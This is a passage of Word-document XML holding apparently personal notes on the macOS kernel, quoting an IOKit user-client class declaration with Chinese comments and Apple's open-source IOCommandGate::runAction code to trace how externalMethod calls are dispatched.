          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    virtual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword3"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> start(IOService *provider);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>连接初使化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    virtual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword3"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> initWithTask(task_t owningTask, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword3"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> * securityToken, UInt32 type,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">                              OSDictionary * properties);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>连接断开或应用程序退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    virtual IOReturn clientClose(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword3"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="comment2"/>
        </w:rPr>
        <w:t>当应用程序调用方法时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">    virtual IOReturn </w:t>
      </w:r>
      <w:r w:rsidRPr="006A53ED">
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>externalMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>( uint32_t selector, IOExternalMethodArguments * arguments,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">                                    IOExternalMethodDispatch * dispatch = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number2"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">, OSObject * target = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number2"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword3"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> * reference = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number2"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="line2"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90B8A" w:rsidRDefault="001E5CDB" w:rsidP="00787949">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00787949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kernel`</w:t>
      </w:r>
      <w:r w:rsidR="00B90B8A" w:rsidRPr="00787949">
        <w:t>IOCommandGate::runAction</w:t>
      </w:r>
      <w:r w:rsidR="00B90B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093586F" w:rsidRPr="00F56FDB" w:rsidRDefault="0093586F" w:rsidP="0093586F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56FDB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\iokit\Kernel\IOCommandGate.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90B8A" w:rsidRPr="00B90B8A" w:rsidRDefault="00B90B8A" w:rsidP="00B90B8A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOReturn IOCommandGate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>runAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Action </w:t>
      </w:r>
      <w:r w:rsidRPr="0093586F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inAction</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void</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arg0</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void</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arg1</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void</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arg2</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void</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arg3</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inAction</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kIOReturnBadArgument</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// closeGate is recursive needn't worry if we already hold the lock.</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closeGat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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// If the command gate is disabled and we aren't on the workloop thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90B8A" w:rsidRPr="00B90B8A" w:rsidRDefault="00B90B8A" w:rsidP="00B90B8A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// itself then sleep until we get enabled.</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IOReturn res</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workLoop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onThread</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while</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enabled</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uintptr_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sleepersP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uintptr_t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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reserved</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sleepersP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color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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IOReturn res </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sleepGate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> THREAD_ABORTSAF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sleepersP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color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wakeupTearDown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sleepersP </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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res </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wakeupTearDown</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openGat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wakeupTearDown</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             commandWakeup</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleepersP</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// No further resources used</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kIOReturnAborted</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bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trace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 gIOKitTrace </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kIOTraceCommandGates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true</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fals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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </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trac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IOTimeStampStartConstant</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IODBG_CMDQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOCMDQ_ACTION</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VM_KERNEL_UNSLIDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inAction</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uintptr_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> owner</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IOStatisticsActionCall</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p>
    <w:p w:rsidR="00B90B8A" w:rsidRPr="00B90B8A" w:rsidRDefault="00B90B8A" w:rsidP="00B90B8A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Must be gated and on the work loop or enabled</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res </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93586F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r w:rsidRPr="0093586F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> arg0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> arg1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> arg2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> arg3</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if</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trac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IOTimeStampEndConstant</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IODBG_CMDQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90B8A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
